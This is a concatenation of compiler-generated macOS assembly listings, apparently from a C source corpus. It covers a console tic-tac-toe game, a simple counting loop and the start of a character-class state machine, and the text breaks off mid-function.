.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $48, %rsp movl $0, -4(%rbp) callq _createBoard movq %rax, -16(%rbp) movb $88, -25(%rbp) movl $0, -32(%rbp) LBB0_1: ## =>This Inner Loop Header: Depth=1 movq -16(%rbp), %rdi callq _gameOver cmpl $0, %eax jne LBB0_14 ## %bb.2: ## in Loop: Header=BB0_1 Depth=1 cmpl $0, -32(%rbp) jne LBB0_4 ## %bb.3: ## in Loop: Header=BB0_1 Depth=1 movq -16(%rbp), %rdi movq ___stdoutp@GOTPCREL(%rip), %rax movq (%rax), %rsi callq _printBoard movsbl -25(%rbp), %esi leaq L_.str(%rip), %rdi movb $0, %al callq _printf jmp LBB0_5 LBB0_4: ## in Loop: Header=BB0_1 Depth=1 leaq L_.str.1(%rip), %rdi callq _puts LBB0_5: ## in Loop: Header=BB0_1 Depth=1 movq ___stdinp@GOTPCREL(%rip), %rax movq (%rax), %rdi callq _getInput movq %rax, -40(%rbp) movq -40(%rbp), %rax movq %rax, -24(%rbp) cmpl $-1, -24(%rbp) jne LBB0_7 ## %bb.6: ## in Loop: Header=BB0_1 Depth=1 jmp LBB0_13 LBB0_7: ## in Loop: Header=BB0_1 Depth=1 movq -16(%rbp), %rdi movb -25(%rbp), %al movq -24(%rbp), %rsi movsbl %al, %edx callq _placeTurn cmpl $0, %eax jne LBB0_9 ## %bb.8: ## in Loop: Header=BB0_1 Depth=1 jmp LBB0_13 LBB0_9: ## in Loop: Header=BB0_1 Depth=1 movsbl -25(%rbp), %eax cmpl $88, %eax jne LBB0_11 ## %bb.10: ## in Loop: Header=BB0_1 Depth=1 movb $79, -25(%rbp) jmp LBB0_12 LBB0_11: ## in Loop: Header=BB0_1 Depth=1 movb $88, -25(%rbp) LBB0_12: ## in Loop: Header=BB0_1 Depth=1 movl $-1, -32(%rbp) LBB0_13: ## in Loop: Header=BB0_1 Depth=1 movl -32(%rbp), %eax addl $1, %eax movl %eax, -32(%rbp) jmp LBB0_1 LBB0_14: movsbl -25(%rbp), %eax cmpl $88, %eax jne LBB0_16 ## %bb.15: movb $79, -25(%rbp) jmp LBB0_17 LBB0_16: movb $88, -25(%rbp) LBB0_17: movq -16(%rbp), %rdi callq _gameOver cmpl $1, %eax jne LBB0_19 ## %bb.18: movsbl -25(%rbp), %esi leaq L_.str.2(%rip), %rdi movb $0, %al callq _printf jmp LBB0_20 LBB0_19: leaq L_.str.3(%rip), %rdi callq _puts LBB0_20: movq -16(%rbp), %rdi movq ___stdoutp@GOTPCREL(%rip), %rax movq (%rax), %rsi callq _printBoard movq -16(%rbp), %rdi callq _freeBoard xorl %eax, %eax addq $48, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _createBoard ## -- Begin function createBoard .p2align 4, 0x90 _createBoard: ## @createBoard .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movslq _boardMax(%rip), %rdi shlq $3, %rdi callq _malloc movq %rax, -8(%rbp) cmpq $0, -8(%rbp) jne LBB1_2 ## %bb.1: movq ___stderrp@GOTPCREL(%rip), %rax movq (%rax), %rdi leaq L_.str.4(%rip), %rsi xorl %eax, %eax ## kill: def $al killed $al killed $eax movl $91, %edx callq _fprintf movl $1, %edi callq _exit LBB1_2: movl $0, -12(%rbp) LBB1_3: ## =>This Inner Loop Header: Depth=1 movl -12(%rbp), %eax cmpl _boardMax(%rip), %eax jge LBB1_8 ## %bb.4: ## in Loop: Header=BB1_3 Depth=1 movslq _boardMax+4(%rip), %rdi shlq $0, %rdi callq _malloc movq %rax, %rdx movq -8(%rbp), %rax movslq -12(%rbp), %rcx movq %rdx, (%rax,%rcx,8) movq -8(%rbp), %rax movslq -12(%rbp), %rcx cmpq $0, (%rax,%rcx,8) jne LBB1_6 ## %bb.5: movq ___stderrp@GOTPCREL(%rip), %rax movq (%rax), %rdi leaq L_.str.4(%rip), %rsi xorl %eax, %eax ## kill: def $al killed $al killed $eax movl $97, %edx callq _fprintf movl $1, %edi callq _exit LBB1_6: ## in Loop: Header=BB1_3 Depth=1 jmp LBB1_7 LBB1_7: ## in Loop: Header=BB1_3 Depth=1 movl -12(%rbp), %eax addl $1, %eax movl %eax, -12(%rbp) jmp LBB1_3 LBB1_8: movl $0, -12(%rbp) LBB1_9: ## =>This Loop Header: Depth=1 ## Child Loop BB1_11 Depth 2 movl -12(%rbp), %eax cmpl _boardMax(%rip), %eax jge LBB1_16 ## %bb.10: ## in Loop: Header=BB1_9 Depth=1 movl $0, -16(%rbp) LBB1_11: ## Parent Loop BB1_9 Depth=1 ## => This Inner Loop Header: Depth=2 movl -16(%rbp), %eax cmpl _boardMax+4(%rip), %eax jge LBB1_14 ## %bb.12: ## in Loop: Header=BB1_11 Depth=2 movq -8(%rbp), %rax movslq -12(%rbp), %rcx movq (%rax,%rcx,8), %rax movslq -16(%rbp), %rcx movb $32, (%rax,%rcx) ## %bb.13: ## in Loop: Header=BB1_11 Depth=2 movl -16(%rbp), %eax addl $1, %eax movl %eax, -16(%rbp) jmp LBB1_11 LBB1_14: ## in Loop: Header=BB1_9 Depth=1 jmp LBB1_15 LBB1_15: ## in Loop: Header=BB1_9 Depth=1 movl -12(%rbp), %eax addl $1, %eax movl %eax, -12(%rbp) jmp LBB1_9 LBB1_16: movq -8(%rbp), %rax addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _gameOver ## -- Begin function gameOver .p2align 4, 0x90 _gameOver: ## @gameOver .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movq %rdi, -16(%rbp) movl $0, -20(%rbp) LBB2_1: ## =>This Inner Loop Header: Depth=1 movl -20(%rbp), %eax cmpl _boardMax(%rip), %eax jge LBB2_8 ## %bb.2: ## in Loop: Header=BB2_1 Depth=1 movq -16(%rbp), %rax movslq -20(%rbp), %rcx movq (%rax,%rcx,8), %rax movsbl (%rax), %eax movq -16(%rbp), %rcx movslq -20(%rbp), %rdx movq (%rcx,%rdx,8), %rcx movsbl 1(%rcx), %ecx cmpl %ecx, %eax jne LBB2_6 ## %bb.3: ## in Loop: Header=BB2_1 Depth=1 movq -16(%rbp), %rax movslq -20(%rbp), %rcx movq (%rax,%rcx,8), %rax movsbl (%rax), %eax movq -16(%rbp), %rcx movslq -20(%rbp), %rdx movq (%rcx,%rdx,8), %rcx movsbl 2(%rcx), %ecx cmpl %ecx, %eax jne LBB2_6 ## %bb.4: ## in Loop: Header=BB2_1 Depth=1 movq -16(%rbp), %rax movslq -20(%rbp), %rcx movq (%rax,%rcx,8), %rax movsbl (%rax), %eax cmpl $32, %eax je LBB2_6 ## %bb.5: movl $1, -4(%rbp) jmp LBB2_35 LBB2_6: ## in Loop: Header=BB2_1 Depth=1 jmp LBB2_7 LBB2_7: ## in Loop: Header=BB2_1 Depth=1 movl -20(%rbp), %eax addl $1, %eax movl %eax, -20(%rbp) jmp LBB2_1 LBB2_8: movl $0, -20(%rbp) LBB2_9: ## =>This Inner Loop Header: Depth=1 movl -20(%rbp), %eax cmpl _boardMax+4(%rip), %eax jge LBB2_16 ## %bb.10: ## in Loop: Header=BB2_9 Depth=1 movq -16(%rbp), %rax movq (%rax), %rax movslq -20(%rbp), %rcx movsbl (%rax,%rcx), %eax movq -16(%rbp), %rcx movq 8(%rcx), %rcx movslq -20(%rbp), %rdx movsbl (%rcx,%rdx), %ecx cmpl %ecx, %eax jne LBB2_14 ## %bb.11: ## in Loop: Header=BB2_9 Depth=1 movq -16(%rbp), %rax movq (%rax), %rax movslq -20(%rbp), %rcx movsbl (%rax,%rcx), %eax movq -16(%rbp), %rcx movq 16(%rcx), %rcx movslq -20(%rbp), %rdx movsbl (%rcx,%rdx), %ecx cmpl %ecx, %eax jne LBB2_14 ## %bb.12: ## in Loop: Header=BB2_9 Depth=1 movq -16(%rbp), %rax movq (%rax), %rax movslq -20(%rbp), %rcx movsbl (%rax,%rcx), %eax cmpl $32, %eax je LBB2_14 ## %bb.13: movl $1, -4(%rbp) jmp LBB2_35 LBB2_14: ## in Loop: Header=BB2_9 Depth=1 jmp LBB2_15 LBB2_15: ## in Loop: Header=BB2_9 Depth=1 movl -20(%rbp), %eax addl $1, %eax movl %eax, -20(%rbp) jmp LBB2_9 LBB2_16: movq -16(%rbp), %rax movq (%rax), %rax movsbl (%rax), %eax movq -16(%rbp), %rcx movq 8(%rcx), %rcx movsbl 1(%rcx), %ecx cmpl %ecx, %eax jne LBB2_20 ## %bb.17: movq -16(%rbp), %rax movq (%rax), %rax movsbl (%rax), %eax movq -16(%rbp), %rcx movq 16(%rcx), %rcx movsbl 2(%rcx), %ecx cmpl %ecx, %eax jne LBB2_20 ## %bb.18: movq -16(%rbp), %rax movq (%rax), %rax movsbl (%rax), %eax cmpl $32, %eax je LBB2_20 ## %bb.19: movl $1, -4(%rbp) jmp LBB2_35 LBB2_20: movq -16(%rbp), %rax movq (%rax), %rax movsbl 2(%rax), %eax movq -16(%rbp), %rcx movq 8(%rcx), %rcx movsbl 1(%rcx), %ecx cmpl %ecx, %eax jne LBB2_24 ## %bb.21: movq -16(%rbp), %rax movq (%rax), %rax movsbl 2(%rax), %eax movq -16(%rbp), %rcx movq 16(%rcx), %rcx movsbl (%rcx), %ecx cmpl %ecx, %eax jne LBB2_24 ## %bb.22: movq -16(%rbp), %rax movq (%rax), %rax movsbl 2(%rax), %eax cmpl $32, %eax je LBB2_24 ## %bb.23: movl $1, -4(%rbp) jmp LBB2_35 LBB2_24: movl $0, -20(%rbp) LBB2_25: ## =>This Loop Header: Depth=1 ## Child Loop BB2_27 Depth 2 movl -20(%rbp), %eax cmpl _boardMax(%rip), %eax jge LBB2_34 ## %bb.26: ## in Loop: Header=BB2_25 Depth=1 movl $0, -24(%rbp) LBB2_27: ## Parent Loop BB2_25 Depth=1 ## => This Inner Loop Header: Depth=2 movl -24(%rbp), %eax cmpl _boardMax+4(%rip), %eax jge LBB2_32 ## %bb.28: ## in Loop: Header=BB2_27 Depth=2 movq -16(%rbp), %rax movslq -20(%rbp), %rcx movq (%rax,%rcx,8), %rax movslq -24(%rbp), %rcx movsbl (%rax,%rcx), %eax cmpl $32, %eax jne LBB2_30 ## %bb.29: movl $0, -4(%rbp) jmp LBB2_35 LBB2_30: ## in Loop: Header=BB2_27 Depth=2 jmp LBB2_31 LBB2_31: ## in Loop: Header=BB2_27 Depth=2 movl -24(%rbp), %eax addl $1, %eax movl %eax, -24(%rbp) jmp LBB2_27 LBB2_32: ## in Loop: Header=BB2_25 Depth=1 jmp LBB2_33 LBB2_33: ## in Loop: Header=BB2_25 Depth=1 movl -20(%rbp), %eax addl $1, %eax movl %eax, -20(%rbp) jmp LBB2_25 LBB2_34: movl $2, -4(%rbp) LBB2_35: movl -4(%rbp), %eax popq %rbp retq .cfi_endproc ## -- End function .globl _printBoard ## -- Begin function printBoard .p2align 4, 0x90 _printBoard: ## @printBoard .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movq %rdi, -8(%rbp) movq %rsi, -16(%rbp) movq -16(%rbp), %rsi leaq L_.str.5(%rip), %rdi callq _fputs movl $0, -20(%rbp) LBB3_1: ## =>This Loop Header: Depth=1 ## Child Loop BB3_3 Depth 2 movl -20(%rbp), %eax cmpl _boardMax(%rip), %eax jge LBB3_8 ## %bb.2: ## in Loop: Header=BB3_1 Depth=1 movq -16(%rbp), %rdi movl -20(%rbp), %edx addl $1, %edx leaq L_.str.6(%rip), %rsi movb $0, %al callq _fprintf movl $0, -24(%rbp) LBB3_3: ## Parent Loop BB3_1 Depth=1 ## => This Inner Loop Header: Depth=2 movl -24(%rbp), %eax movl _boardMax+4(%rip), %ecx subl $1, %ecx cmpl %ecx, %eax jge LBB3_6 ## %bb.4: ## in Loop: Header=BB3_3 Depth=2 movq -8(%rbp), %rax movslq -20(%rbp), %rcx movq (%rax,%rcx,8), %rax movslq -24(%rbp), %rcx movsbl (%rax,%rcx), %esi leaq L_.str.7(%rip), %rdi movb $0, %al callq _printf ## %bb.5: ## in Loop: Header=BB3_3 Depth=2 movl -24(%rbp), %eax addl $1, %eax movl %eax, -24(%rbp) jmp LBB3_3 LBB3_6: ## in Loop: Header=BB3_1 Depth=1 movq -8(%rbp), %rax movslq -20(%rbp), %rcx movq (%rax,%rcx,8), %rax movslq -24(%rbp), %rcx movsbl (%rax,%rcx), %esi leaq L_.str.8(%rip), %rdi movb $0, %al callq _printf movq -16(%rbp), %rsi movl $10, %edi callq _fputc ## %bb.7: ## in Loop: Header=BB3_1 Depth=1 movl -20(%rbp), %eax addl $1, %eax movl %eax, -20(%rbp) jmp LBB3_1 LBB3_8: addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _getInput ## -- Begin function getInput .p2align 4, 0x90 _getInput: ## @getInput .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movq %rdi, -16(%rbp) movq L___const.getInput.returnVal(%rip), %rax movq %rax, -8(%rbp) movb $0, -17(%rbp) movq -16(%rbp), %rdi leaq -8(%rbp), %rcx leaq L_.str.9(%rip), %rsi leaq -17(%rbp), %rdx movb $0, %al callq _fscanf LBB4_1: ## =>This Inner Loop Header: Depth=1 movq -16(%rbp), %rdi callq _fgetc cmpl $10, %eax je LBB4_3 ## %bb.2: ## in Loop: Header=BB4_1 Depth=1 jmp LBB4_1 LBB4_3: movsbl -17(%rbp), %eax cmpl $0, %eax je LBB4_5 ## %bb.4: movsbl -17(%rbp), %eax subl $65, %eax movl %eax, -4(%rbp) LBB4_5: cmpl $-1, -8(%rbp) je LBB4_7 ## %bb.6: movl -8(%rbp), %eax subl $1, %eax movl %eax, -8(%rbp) LBB4_7: cmpl $0, -8(%rbp) jl LBB4_11 ## %bb.8: cmpl $2, -8(%rbp) jg LBB4_11 ## %bb.9: cmpl $0, -4(%rbp) jl LBB4_11 ## %bb.10: cmpl $2, -4(%rbp) jle LBB4_12 LBB4_11: movl $-1, -8(%rbp) movl $-1, -4(%rbp) LBB4_12: movq -8(%rbp), %rax addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _placeTurn ## -- Begin function placeTurn .p2align 4, 0x90 _placeTurn: ## @placeTurn .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movb %dl, %al movq %rsi, -16(%rbp) movq %rdi, -24(%rbp) movb %al, -25(%rbp) movq -24(%rbp), %rax movslq -16(%rbp), %rcx movq (%rax,%rcx,8), %rax movslq -12(%rbp), %rcx movsbl (%rax,%rcx), %eax cmpl $32, %eax je LBB5_2 ## %bb.1: movl $0, -4(%rbp) jmp LBB5_3 LBB5_2: movb -25(%rbp), %dl movq -24(%rbp), %rax movslq -16(%rbp), %rcx movq (%rax,%rcx,8), %rax movslq -12(%rbp), %rcx movb %dl, (%rax,%rcx) movl $1, -4(%rbp) LBB5_3: movl -4(%rbp), %eax popq %rbp retq .cfi_endproc ## -- End function .globl _freeBoard ## -- Begin function freeBoard .p2align 4, 0x90 _freeBoard: ## @freeBoard .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movq %rdi, -8(%rbp) movl $0, -12(%rbp) LBB6_1: ## =>This Inner Loop Header: Depth=1 movl -12(%rbp), %eax cmpl _boardMax(%rip), %eax jge LBB6_4 ## %bb.2: ## in Loop: Header=BB6_1 Depth=1 movq -8(%rbp), %rax movslq -12(%rbp), %rcx movq (%rax,%rcx,8), %rdi callq _free ## %bb.3: ## in Loop: Header=BB6_1 Depth=1 movl -12(%rbp), %eax addl $1, %eax movl %eax, -12(%rbp) jmp LBB6_1 LBB6_4: movq -8(%rbp), %rdi callq _free addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__const .globl _boardMax ## @boardMax .p2align 2 _boardMax: .long 3 ## 0x3 .long 3 ## 0x3 .globl _naughtChar ## @naughtChar _naughtChar: .byte 79 ## 0x4f .globl _crossChar ## @crossChar _crossChar: .byte 88 ## 0x58 .globl _emptyChar ## @emptyChar _emptyChar: .byte 32 ## 0x20 .globl _notOver ## @notOver .p2align 2 _notOver: .long 0 ## 0x0 .globl _win ## @win .p2align 2 _win: .long 1 ## 0x1 .globl _draw ## @draw .p2align 2 _draw: .long 2 ## 0x2 .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "It's %c's turn.\nChoose co-ordinates: " L_.str.1: ## @.str.1 .asciz "Incorrect input, please try again" L_.str.2: ## @.str.2 .asciz "Game over. %c wins.\n" L_.str.3: ## @.str.3 .asciz "Game over. Draw.\n" L_.str.4: ## @.str.4 .asciz "NULL Pointer errror on line %d\nSuspected memory allocation error or file opening error.\n" L_.str.5: ## @.str.5 .asciz " A B C\n" L_.str.6: ## @.str.6 .asciz "%i [" L_.str.7: ## @.str.7 .asciz " %c," L_.str.8: ## @.str.8 .asciz " %c ]" .section __TEXT,__literal8,8byte_literals .p2align 2 ## @__const.getInput.returnVal L___const.getInput.returnVal: .long 4294967295 ## 0xffffffff .long 4294967295 ## 0xffffffff .section __TEXT,__cstring,cstring_literals L_.str.9: ## @.str.9 .asciz "%c%d" .subsections_via_symbols
the_stack_data/132953394.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur wzr, [x29, #-4] mov w8, #10 str w8, [sp, #8] b LBB0_1 LBB0_1: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #8] subs w8, w8, #20 cset w8, ge tbnz w8, #0, LBB0_3 b LBB0_2 LBB0_2: ; in Loop: Header=BB0_1 Depth=1 ldr w9, [sp, #8] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x8, [x9] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf ldr w8, [sp, #8] add w8, w8, #1 str w8, [sp, #8] b LBB0_1 LBB0_3: mov w0, #0 ldp x29, x30, [sp, #16] ; 16-byte Folded Reload add sp, sp, #32 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "value of a: %d\n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movl $0, -4(%rbp) movl $10, -8(%rbp) LBB0_1: ## =>This Inner Loop Header: Depth=1 cmpl $20, -8(%rbp) jge LBB0_3 ## %bb.2: ## in Loop: Header=BB0_1 Depth=1 movl -8(%rbp), %esi leaq L_.str(%rip), %rdi movb $0, %al callq _printf movl -8(%rbp), %eax addl $1, %eax movl %eax, -8(%rbp) jmp LBB0_1 LBB0_3: xorl %eax, %eax addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "value of a: %d\n" .subsections_via_symbols
the_stack_data/162644433.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _EOL_FLAG ; -- Begin function EOL_FLAG .p2align 2 _EOL_FLAG: ; @EOL_FLAG .cfi_startproc ; %bb.0: mov w0, #0 ret .cfi_endproc ; -- End function .globl _stepit ; -- Begin function stepit .p2align 2 _stepit: ; @stepit .cfi_startproc ; %bb.0: sub sp, sp, #80 .cfi_def_cfa_offset 80 stp x29, x30, [sp, #64] ; 16-byte Folded Spill add x29, sp, #64 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 sturb w0, [x29, #-1] sturb w1, [x29, #-2] adrp x8, _State@PAGE ldr w8, [x8, _State@PAGEOFF] subs w8, w8, #1 ; kill: def $x8 killed $w8 stur x8, [x29, #-16] ; 8-byte Folded Spill subs x8, x8, #32 cset w8, hi tbnz w8, #0, LBB1_257 ; %bb.1: ldur x11, [x29, #-16] ; 8-byte Folded Reload adrp x10, lJTI1_0@PAGE add x10, x10, lJTI1_0@PAGEOFF Ltmp0: adr x8, Ltmp0 ldrsw x9, [x10, x11, lsl #2] add x8, x8, x9 br x8 LBB1_2: ldursb w0, [x29, #-1] adrp x1, _strx13@PAGE add x1, x1, _strx13@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_5 b LBB1_3 LBB1_3: ldursb w0, [x29, #-2] adrp x1, _strx1@PAGE add x1, x1, _strx1@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_5 b LBB1_4 LBB1_4: ldursb w2, [x29, #-1] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF adrp x1, l_.str.1@PAGE add x1, x1, l_.str.1@PAGEOFF bl _action mov w8, #1 adrp x9, _State@PAGE str w8, [x9, _State@PAGEOFF] b LBB1_258 LBB1_5: ldursb w0, [x29, #-1] adrp x1, _strx12@PAGE add x1, x1, _strx12@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_8 b LBB1_6 LBB1_6: ldursb w0, [x29, #-2] adrp x1, _strx1@PAGE add x1, x1, _strx1@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_8 b LBB1_7 LBB1_7: ldursb w2, [x29, #-1] adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF adrp x1, l_.str.3@PAGE add x1, x1, l_.str.3@PAGEOFF bl _action mov w8, #19 adrp x9, _State@PAGE str w8, [x9, _State@PAGEOFF] b LBB1_258 LBB1_8: b LBB1_257 LBB1_9: ldursb w0, [x29, #-1] adrp x1, _strx5@PAGE add x1, x1, _strx5@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_12 b LBB1_10 LBB1_10: ldursb w0, [x29, #-2] adrp x1, _strx5@PAGE add x1, x1, _strx5@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_12 b LBB1_11 LBB1_11: ldursb w2, [x29, #-1] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF adrp x1, l_.str.1@PAGE add x1, x1, l_.str.1@PAGEOFF bl _action mov w8, #2 adrp x9, _State@PAGE str w8, [x9, _State@PAGEOFF] b LBB1_258 LBB1_12: ldursb w0, [x29, #-1] adrp x1, _strx5@PAGE add x1, x1, _strx5@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_15 b LBB1_13 LBB1_13: ldursb w0, [x29, #-2] adrp x1, _strx14@PAGE add x1, x1, _strx14@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_15 b LBB1_14 LBB1_14: ldursb w2, [x29, #-1] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF adrp x1, l_.str.1@PAGE add x1, x1, l_.str.1@PAGEOFF bl _action mov w8, #3 adrp x9, _State@PAGE str w8, [x9, _State@PAGEOFF] b LBB1_258 LBB1_15: b LBB1_257 LBB1_16: ldursb w0, [x29, #-1] adrp x1, _strx14@PAGE add x1, x1, _strx14@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_19 b LBB1_17 LBB1_17: ldursb w0, [x29, #-2] adrp x1, _strx1@PAGE add x1, x1, _strx1@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_19 b LBB1_18 LBB1_18: ldursb w2, [x29, #-1] adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF adrp x1, l_.str.4@PAGE add x1, x1, l_.str.4@PAGEOFF bl _action mov w8, #19 adrp x9, _State@PAGE str w8, [x9, _State@PAGEOFF] b LBB1_258 LBB1_19: b LBB1_257 LBB1_20: ldursb w0, [x29, #-1] adrp x1, _strx14@PAGE add x1, x1, _strx14@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_23 b LBB1_21 LBB1_21: ldursb w0, [x29, #-2] adrp x1, _strx5@PAGE add x1, x1, _strx5@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_23 b LBB1_22 LBB1_22: ldursb w2, [x29, #-1] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF adrp x1, l_.str.1@PAGE add x1, x1, l_.str.1@PAGEOFF bl _action mov w8, #2 adrp x9, _State@PAGE str w8, [x9, _State@PAGEOFF] b LBB1_258 LBB1_23: b LBB1_257 LBB1_24: ldursb w0, [x29, #-1] adrp x1, _strx15@PAGE add x1, x1, _strx15@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_27 b LBB1_25 LBB1_25: ldursb w0, [x29, #-2] adrp x1, _strx15@PAGE add x1, x1, _strx15@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_27 b LBB1_26 LBB1_26: ldursb w2, [x29, #-1] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF adrp x1, l_.str.1@PAGE add x1, x1, l_.str.1@PAGEOFF bl _action mov w8, #5 adrp x9, _State@PAGE str w8, [x9, _State@PAGEOFF] b LBB1_258 LBB1_27: ldursb w0, [x29, #-1] adrp x1, _strx15@PAGE add x1, x1, _strx15@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_30 b LBB1_28 LBB1_28: ldursb w0, [x29, #-2] adrp x1, _strx1@PAGE add x1, x1, _strx1@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_30 b LBB1_29 LBB1_29: ldursb w2, [x29, #-1] adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF adrp x1, l_.str.5@PAGE add x1, x1, l_.str.5@PAGEOFF bl _action mov w8, #19 adrp x9, _State@PAGE str w8, [x9, _State@PAGEOFF] b LBB1_258 LBB1_30: b LBB1_257 LBB1_31: ldursb w0, [x29, #-1] adrp x1, _strx23@PAGE add x1, x1, _strx23@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_34 b LBB1_32 LBB1_32: ldursb w0, [x29, #-2] adrp x1, _strx1@PAGE add x1, x1, _strx1@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_34 b LBB1_33 LBB1_33: ldursb w2, [x29, #-1] adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF adrp x1, l_.str.6@PAGE add x1, x1, l_.str.6@PAGEOFF bl _action mov w8, #19 adrp x9, _State@PAGE str w8, [x9, _State@PAGEOFF] b LBB1_258 LBB1_34: b LBB1_257 LBB1_35: ldursb w0, [x29, #-1] adrp x1, _strx8@PAGE add x1, x1, _strx8@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_38 b LBB1_36 LBB1_36: ldursb w0, [x29, #-2] adrp x1, _strx8@PAGE add x1, x1, _strx8@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_38 b LBB1_37 LBB1_37: ldursb w2, [x29, #-1] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF adrp x1, l_.str.1@PAGE add x1, x1, l_.str.1@PAGEOFF bl _action mov w8, #7 adrp x9, _State@PAGE str w8, [x9, _State@PAGEOFF] b LBB1_258 LBB1_38: ldursb w0, [x29, #-1] adrp x1, _strx8@PAGE add x1, x1, _strx8@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_41 b LBB1_39 LBB1_39: ldursb w0, [x29, #-2] adrp x1, _strx1@PAGE add x1, x1, _strx1@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_41 b LBB1_40 LBB1_40: ldursb w2, [x29, #-1] adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF adrp x1, l_.str.7@PAGE add x1, x1, l_.str.7@PAGEOFF bl _action mov w8, #19 adrp x9, _State@PAGE str w8, [x9, _State@PAGEOFF] b LBB1_258 LBB1_41: b LBB1_257 LBB1_42: ldursb w0, [x29, #-1] adrp x1, _strx10@PAGE add x1, x1, _strx10@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_45 b LBB1_43 LBB1_43: ldursb w0, [x29, #-2] adrp x1, _strx10@PAGE add x1, x1, _strx10@PAGEOFF bl _in_string subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_45 b LBB1_44 LBB1_44: ldursb w2, [x29, #-1] adrp x0, l_.str@PAGE add x0, x0, 